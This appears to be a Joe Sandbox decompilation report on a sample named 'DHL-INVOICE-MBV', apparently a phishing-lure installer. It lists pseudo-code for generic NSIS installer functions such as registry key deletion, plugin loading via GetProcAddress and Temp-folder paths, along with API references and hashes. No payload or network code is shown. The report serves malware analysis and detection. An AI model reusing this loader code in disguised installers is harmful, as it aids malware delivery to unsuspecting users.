0x0040299b
0x0040299b
0x004029a2
0x0040224b
0x00402ac8
0x00402ad4

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
GlobalFree.KERNEL32(?), ref: 00402956
GlobalFree.KERNEL32(00000000), ref: 00402969
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: de92c1bd6f77b34e2ba4b4bc505dbe4f635d2773414333dd82a7c43b5c6c5a79
Instruction ID: 08f8d52deffd015bf7aba9006bc7b8b19cff7c85b8e7ef16137ebd65050c2e74
Opcode Fuzzy Hash: de92c1bd6f77b34e2ba4b4bc505dbe4f635d2773414333dd82a7c43b5c6c5a79
Instruction Fuzzy Hash: 1B218071C00528BBCF116FA5DE49D9E7E79EF08364F10023AF954762E1CB794D419B98

Uniqueness

Uniqueness Score: -1.00%

Function 00404AA8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404AA8(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E004062A6(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E004062A6(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E004062A6(_t44, _t50, 0x4236e8, 0x4236e8, _a8);
				wsprintfW(_t34 + lstrlenW(0x4236e8) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x4291d8, _a4, 0x4236e8);
			}

0x00404ab1
0x00404ab6
0x00404abe
0x00404abf
0x00404acc
0x00404ad4
0x00404ad5
0x00404ad7
0x00404ad9
0x00404adb
0x00404ade
0x00404ade
0x00404ae5
0x00404aeb
0x00404aeb
0x00404af2
0x00404af9
0x00404afc
0x00404aff
0x00404aff
0x00404b03
0x00404b13
0x00404b15
0x00404b18
0x00404ac1
0x00404ac1
0x00404ac8
0x00404ac8
0x00404b20
0x00404b2b
0x00404b41
0x00404b52
0x00404b6e

APIs

lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B49
wsprintfW.USER32 ref: 00404B52
SetDlgItemTextW.USER32(?,004236E8), ref: 00404B65

Strings

%u.%u%s%s, xrefs: 00404B33
6B, xrefs: 00404B3B

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$6B
API String ID: 3540041739-3884863406
Opcode ID: 4da95cfef184c8e5e741e241c615311e7070c24a3f1e6bca6f3b0d0e52bef44f
Instruction ID: 22ef8b20c3cb34d9681d0f1950c5ee3b7e818b69147609aa9b6e87f13a537159
Opcode Fuzzy Hash: 4da95cfef184c8e5e741e241c615311e7070c24a3f1e6bca6f3b0d0e52bef44f
Instruction Fuzzy Hash: 18110833A041283BDB10A96D9C46F9F329CDB85374F250237FA26F21D1DA79DC2182E8

Uniqueness

Uniqueness Score: -1.00%

Function 00402598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69
stringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00402598(int __ebx, void* __edx, intOrPtr* __esi) {
				signed int _t14;
				int _t17;
				int _t24;
				signed int _t29;
				intOrPtr* _t32;
				void* _t34;
				void* _t35;
				void* _t38;
				signed int _t40;

				_t32 = __esi;
				_t24 = __ebx;
				_t14 =  *(_t35 - 0x20);
				_t38 = __edx - 0x38;
				 *(_t35 - 0x4c) = _t14;
				_t27 = 0 | _t38 == 0x00000000;
				_t29 = _t38 == 0;
				if(_t14 == __ebx) {
					if(__edx != 0x38) {
						_t17 = lstrlenW(E00402C41(0x11)) + _t16;
					} else {
						E00402C41(0x21);
						WideCharToMultiByte(__ebx, __ebx, "C:\Users\Arthur\AppData\Local\Temp\nsd3A3C.tmp", 0xffffffff, "C:\Users\Arthur\AppData\Local\Temp\nsd3A3C.tmp\System.dll", 0x400, __ebx, __ebx);
						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nsd3A3C.tmp\System.dll");
					}
				} else {
					E00402C1F(1);
					 *0x40ada8 = __ax;
					 *((intOrPtr*)(__ebp - 0x3c)) = __edx;
				}
				 *(_t35 + 8) = _t17;
				if( *_t32 == _t24) {
					L13:
					 *((intOrPtr*)(_t35 - 4)) = 1;
				} else {
					_t34 = E004061E4(_t27, _t32);
					if((_t29 |  *(_t35 - 0x4c)) != 0 ||  *((intOrPtr*)(_t35 - 0x1c)) == _t24 || E00405E5B(_t34, _t34) >= 0) {
						_t14 = E00405E2C(_t34, "C:\Users\Arthur\AppData\Local\Temp\nsd3A3C.tmp\System.dll",  *(_t35 + 8));
						_t40 = _t14;
						if(_t40 == 0) {
							goto L13;
						}
					} else {
						goto L13;
					}
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00402598
0x00402598
0x00402598
0x0040259d
0x004025a0
0x004025a3
0x004025a8
0x004025aa
0x004025ca
0x00402608
0x004025cc
0x004025ce
0x004025e8
0x004025f3
0x004025f3
0x004025ac
0x004025ae
0x004025b3
0x004025c1
0x004025c4
0x0040260d
0x00402610
0x0040288b
0x0040288b
0x00402616
0x0040261f
0x00402621
0x00402640
0x004015b4
0x004015b6
0x00000000
0x004015bc
0x00000000
0x00000000
0x00000000
0x00402621
0x00402ac8
0x00402ad4

APIs

WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3

Strings

C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp\System.dll, xrefs: 004025B3, 004025DA, 004025EE, 0040263A
C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp, xrefs: 004025E1

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp$C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp\System.dll
API String ID: 3109718747-653002629
Opcode ID: d16774647d0c3b57a9c0354c15aa2feef0a14e9a17d8eebea2b137cd7cb3cc12
Instruction ID: 3dcd1766983357fa33eb9a2b17af164457a9c6038e68ae70dd04151361e6fae4
Opcode Fuzzy Hash: d16774647d0c3b57a9c0354c15aa2feef0a14e9a17d8eebea2b137cd7cb3cc12
Instruction Fuzzy Hash: D7110872A00300BEDB146BB1CE89A9F76649F54389F20843BF502F61D1DAFC89425B6E

Uniqueness

Uniqueness Score: -1.00%

Function 74112398 Relevance: 7.6, APIs: 5, Instructions: 135
memoryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E74112398(void* __edx) {
				void* _t37;
				signed int _t38;
				void* _t39;
				void* _t41;
				signed char* _t42;
				signed char* _t51;
				void* _t52;
				void* _t54;

				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
				while(1) {
					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
					_t52 = _t51[0x18];
					if(_t52 == 0) {
						goto L9;
					}
					_t41 = 0x1a;
					if(_t52 == _t41) {
						goto L9;
					}
					if(_t52 != 0xffffffff) {
						if(_t52 <= 0 || _t52 > 0x19) {
							_t51[0x18] = _t41;
							goto L12;
						} else {
							_t37 = E741112BA(_t52 - 1);
							L10:
							goto L11;
						}
					} else {
						_t37 = E74111243();
						L11:
						_t52 = _t37;
						L12:
						_t13 =  &(_t51[8]); // 0x1020
						_t42 = _t13;
						if(_t51[4] >= 0) {
						}
						_t38 =  *_t51 & 0x000000ff;
						_t51[0x1c] = 0;
						if(_t38 > 7) {
							L27:
							_t39 = GlobalFree(_t52);
							if( *(_t54 + 0x10) == 0) {
								return _t39;
							}
							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
							} else {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t38 * 4 +  &M74112510))) {
								case 0:
									 *_t42 = 0;
									goto L27;
								case 1:
									__eax = E74111311(__ebp);
									goto L21;
								case 2:
									 *__edi = E74111311(__ebp);
									__edi[1] = __edx;
									goto L27;
								case 3:
									__eax = GlobalAlloc(0x40,  *0x7411406c);
									 *(__esi + 0x1c) = __eax;
									__edx = 0;
									 *__edi = __eax;
									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x7411406c, __eax,  *0x7411406c, 0, 0);
									goto L27;
								case 4:
									__eax = E7411122C(__ebp);
									 *(__esi + 0x1c) = __eax;
									L21:
									 *__edi = __eax;
									goto L27;
								case 5:
									__eax = GlobalAlloc(0x40, 0x10);
									_push(__eax);
									 *(__esi + 0x1c) = __eax;
									_push(__ebp);
									 *__edi = __eax;
									__imp__CLSIDFromString();
									goto L27;
								case 6:
									if( *__ebp != __cx) {
										__eax = E74111311(__ebp);
										 *__ebx = __eax;
									}
									goto L27;
								case 7:
									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
									( *(__esi + 0x18) - 1) *  *0x7411406c =  *0x74114074 + ( *(__esi + 0x18) - 1) *  *0x7411406c * 2 + 0x18;
									 *__ebx =  *0x74114074 + ( *(__esi + 0x18) - 1) *  *0x7411406c * 2 + 0x18;
									asm("cdq");
									__eax = E74111470(__edx,  *0x74114074 + ( *(__esi + 0x18) - 1) *  *0x7411406c * 2 + 0x18, __edx,  *0x74114074 + ( *(__esi + 0x18) - 1) *  *0x7411406c * 2);
									goto L27;
							}
						}
					}
					L9:
					_t37 = E7411122C(0x74114044);
					goto L10;
				}
			}

0x741123ac
0x741123b0
0x741123bb
0x741123bb
0x741123c2
0x741123c7
0x00000000
0x00000000
0x741123cb
0x741123ce
0x00000000
0x00000000
0x741123d3
0x741123de
0x741123ee
0x00000000
0x741123e5
0x741123e7
0x741123fd
0x00000000
0x741123fd
0x741123d5
0x741123d5
0x741123fe
0x741123fe
0x74112400
0x74112404
0x74112404
0x74112407
0x74112407
0x7411240f
0x74112417
0x7411241a
0x741124d9
0x741124da
0x741124e5
0x7411250f
0x7411250f
0x741124f5
0x74112501
0x741124f7
0x741124f7
0x741124f7
0x00000000
0x74112420
0x74112420
0x00000000
0x74112427
0x00000000
0x00000000
0x7411242f
0x00000000
0x00000000
0x7411243d
0x7411243f
0x00000000
0x00000000
0x74112460
0x74112466
0x74112469
0x7411246b
0x7411247b
0x00000000
0x00000000
0x74112448
0x7411244d
0x74112450
0x74112451
0x00000000
0x00000000
0x74112487
0x7411248d
0x7411248e
0x74112491
0x74112492
0x74112494
0x00000000
0x00000000
0x741124a0
0x741124a3
0x741124af
0x741124b1
0x00000000
0x00000000
0x741124bd
0x741124c9
0x741124cc
0x741124ce
0x741124d1
0x00000000
0x00000000
0x74112420
0x7411241a
0x741123f3
0x741123f8
0x00000000
0x741123f8

APIs

GlobalFree.KERNEL32(00000000), ref: 741124DA

Part of subcall function 7411122C: lstrcpynW.KERNEL32(00000000,?,741112DF,00000019,741111BE,-000000A0), ref: 7411123C

GlobalAlloc.KERNEL32(00000040), ref: 74112460
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 7411247B

Memory Dump Source

Source File: 00000001.00000002.18002086592.0000000074111000.00000020.00000001.01000000.00000004.sdmp, Offset: 74110000, based on PE: true

Associated: 00000001.00000002.18002024165.0000000074110000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.18002166253.0000000074113000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.18002259835.0000000074115000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_74110000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: 28ed6a71473bed5aaf1c100c55019d920e5c1240aefadb16e42a377cb32ed55a
Instruction ID: 2051b49e67d388039871ea180b21128959e2e765fa40880aa36448d1f64caa72
Opcode Fuzzy Hash: 28ed6a71473bed5aaf1c100c55019d920e5c1240aefadb16e42a377cb32ed55a
Instruction Fuzzy Hash: 4541B17521430AEFD310FF22D9C0AAAB7F9EB98310B2145BDF486E7945D734A644CB62

Uniqueness

Uniqueness Score: -1.00%

Function 74111621 Relevance: 7.5, APIs: 5, Instructions: 41
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E74111621(struct HINSTANCE__* _a4, short* _a8) {
				_Unknown_base(*)()* _t7;
				void* _t10;
				int _t14;

				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t10 = GlobalAlloc(0x40, _t14);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
				_t7 = GetProcAddress(_a4, _t10);
				GlobalFree(_t10);
				return _t7;
			}

0x7411163b
0x74111647
0x74111654
0x7411165b
0x74111664
0x74111670

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,741121F0,?,00000808), ref: 74111639
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,741121F0,?,00000808), ref: 74111640
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,741121F0,?,00000808), ref: 74111654
GetProcAddress.KERNEL32(741121F0,00000000), ref: 7411165B
GlobalFree.KERNEL32(00000000), ref: 74111664

Memory Dump Source

Source File: 00000001.00000002.18002086592.0000000074111000.00000020.00000001.01000000.00000004.sdmp, Offset: 74110000, based on PE: true

Associated: 00000001.00000002.18002024165.0000000074110000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.18002166253.0000000074113000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.18002259835.0000000074115000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_74110000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: 628d7497b121de06fb7496bdafcd74a42d06588c616951c2508ed243abcf58d7
Instruction ID: d562670653b1a5cb479c63752cb17636cfd90dfad1214ae710437c60b1410cca
Opcode Fuzzy Hash: 628d7497b121de06fb7496bdafcd74a42d06588c616951c2508ed243abcf58d7
Instruction Fuzzy Hash: 55F0AC732161387BE62127A78D4CDDBBE9CDF8B2F5B220215F628A219486619D01DBF1

Uniqueness

Uniqueness Score: -1.00%

Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401D5D() {
				void* _t18;
				struct HINSTANCE__* _t22;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8),  *(_t27 - 0x24));
				GetClientRect(_t25, _t27 - 0x58);
				_t18 = SendMessageW(_t25, 0x172, _t22, LoadImageW(_t22, E00402C41(_t22), _t22,  *(_t27 - 0x50) *  *(_t27 - 0x20),  *(_t27 - 0x4c) *  *(_t27 - 0x20), 0x10));
				if(_t18 != _t22) {
					DeleteObject(_t18);
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}

0x00401d69
0x00401d70
0x00401d9f
0x00401da7
0x00401dae
0x00401dae
0x00402ac8
0x00402ad4

APIs

GetDlgItem.USER32(?,?), ref: 00401D63
GetClientRect.USER32(00000000,?), ref: 00401D70
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
DeleteObject.GDI32(00000000), ref: 00401DAE

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: c67b0ddec5e66c67a0e6e1e56ee4085375d163049c04c7743caf2b99499fe694
Instruction ID: 40ca5798c6d3b59526a1ee34621216737133408fbccdd52925800404f238639f
Opcode Fuzzy Hash: c67b0ddec5e66c67a0e6e1e56ee4085375d163049c04c7743caf2b99499fe694
Instruction Fuzzy Hash: A3F0EC72A04518AFDB01DBE4DE88CEEB7BCEB48301B14047AF641F61A0CA749D519B78

Uniqueness

Uniqueness Score: -1.00%

Function 00405B59 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00405B59(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}

0x00405b5a
0x00405b67
0x00405b68
0x00405b73
0x00405b7b
0x00405b7b
0x00405b83

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403346,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75F73420,004035A3,?,00000006,00000008,0000000A), ref: 00405B5F
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403346,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75F73420,004035A3,?,00000006,00000008,0000000A), ref: 00405B69
lstrcatW.KERNEL32(?,0040A014), ref: 00405B7B

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405B59

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3355392842
Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
Instruction ID: 08a0f08e2fd7ff087bee52c9af407669d9ccaaad5643cecad56c46479ba8d62d
Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
Instruction Fuzzy Hash: 63D05E31101A24AAC1117B449C04DDF62ACAE85348382007AF541B20A1C77C695186FD

Uniqueness

Uniqueness Score: -1.00%

Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00402D44(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				short _v532;
				void* _t19;
				signed int _t25;
				intOrPtr* _t27;
				signed int _t32;
				signed int _t33;
				signed int _t34;

				_t33 = _a12;
				_t34 = _t33 & 0x00000300;
				_t32 = _t33 & 0x00000001;
				_t19 = E004060F1(__eflags, _a4, _a8, _t34 | 0x00000008,  &_v8);
				if(_t19 == 0) {
					while(RegEnumKeyW(_v8, 0,  &_v532, 0x105) == 0) {
						__eflags = _t32;
						if(__eflags != 0) {
							RegCloseKey(_v8);
							return 0x3eb;
						}
						_t25 = E00402D44(__eflags, _v8,  &_v532, _a12);
						__eflags = _t25;
						if(_t25 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E0040665E(3);
					if(_t27 == 0) {
						return RegDeleteKeyW(_a4, _a8);
					}
					return  *_t27(_a4, _a8, _t34, 0);
				}
				return _t19;
			}

0x00402d4f
0x00402d58
0x00402d61
0x00402d6d
0x00402d74
0x00402d98
0x00402d7e
0x00402d80
0x00402dd3
0x00000000
0x00402dd9
0x00402d8f
0x00402d94
0x00402d96
0x00000000
0x00000000
0x00402d96
0x00402db2
0x00402dba
0x00402dc1
0x00000000
0x00402de6
0x00000000
0x00402dcc
0x00402df0

APIs

RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: 4f7896fd8e1a6772bb9654ca63d7b3999030aaa3338996957b6cfad32b556e6b
Instruction ID: 673fb129a4d8ab743942914098bbacbd975ea3c1b6875aa08396d434171036d0
Opcode Fuzzy Hash: 4f7896fd8e1a6772bb9654ca63d7b3999030aaa3338996957b6cfad32b556e6b
Instruction Fuzzy Hash: C7116A32500108FBDF02AB90CE09FEE7B7DAF54340F100076B905B51E0EBB59E21AB58

Uniqueness

Uniqueness Score: -1.00%

Function 00402E79 Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402E79(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x418ea0; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x42a210;
						if(_t2 >  *0x42a210) {
							_t3 = CreateDialogParamW( *0x42a200, 0x6f, 0, E00402DF3, 0);
							 *0x418ea0 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E0040669A(0);
					}
				} else {
					_t6 =  *0x418ea0; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x418ea0 = 0;
					return _t6;
				}
			}

0x00402e80
0x00402e9a
0x00402ea0
0x00402eaa
0x00402eb0
0x00402eb6
0x00402ec7
0x00402ed0
0x00000000
0x00402ed5
0x00402edc
0x00402ea2
0x00402ea9
0x00402ea9
0x00402e82
0x00402e82
0x00402e89
0x00402e8c
0x00402e8c
0x00402e92
0x00402e99
0x00402e99

APIs

DestroyWindow.USER32(00000000,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
GetTickCount.KERNEL32 ref: 00402EAA
